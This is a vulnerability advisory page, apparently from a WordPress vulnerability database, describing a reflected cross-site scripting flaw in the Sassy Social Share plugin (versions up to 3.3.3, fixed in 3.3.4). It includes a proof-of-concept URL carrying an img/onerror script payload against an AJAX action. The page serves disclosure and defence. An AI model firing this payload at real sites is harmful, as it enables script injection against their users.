Sassy Social Share <= 3.3.3 – Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

AJAX endpoints which returns JSON data has no Content-Type header set, and uses default text/html. Any JSON that has HTML will be rendered as such.

Proof of Concept

PoC URL (uses unauthenticated action "heateor_sss_sharing_count"):
http://WORDPRESS_DOMAIN_HERE/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[<img%20src%3dx%20onerror%3dalert(document.domain)>]=

Other authenticated AJAX actions may also lead to reflected XSS, but not tested.

Affects Plugins

sassy-social-share

Fixed in 3.3.4

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Original Researcher

Nicholas Mun

Submitter

Nicholas Mun

Submitter twitter

Verified

No

WPVDB ID

4631519b-2060-43a0-b69b-b3d7ed94c705

Timeline

Publicly Published

2019-11-17 (about 4 years ago)

Added

2019-11-18 (about 4 years ago)

Last Updated

2019-11-25 (about 4 years ago)

Other

Published

Title

Published

2023-02-15

Title

WordPress Social Login and Register < 7.5.15 - Multiple CSRF

Published

2021-09-09

Title

RSVPMaker Excel <= 1.1 - Reflected Cross-Site Scripting

Published

2016-02-29

Title

Good News Themes - Reflected Cross-Site Scripting (XSS)

Published

2022-12-28

Title

Meteor Slides < 1.5.7 - Contributor+ Stored XSS

Published

2023-04-10

Title

Product Catalog Feed by PixelYourSite < 2.1.1 - Reflected XSS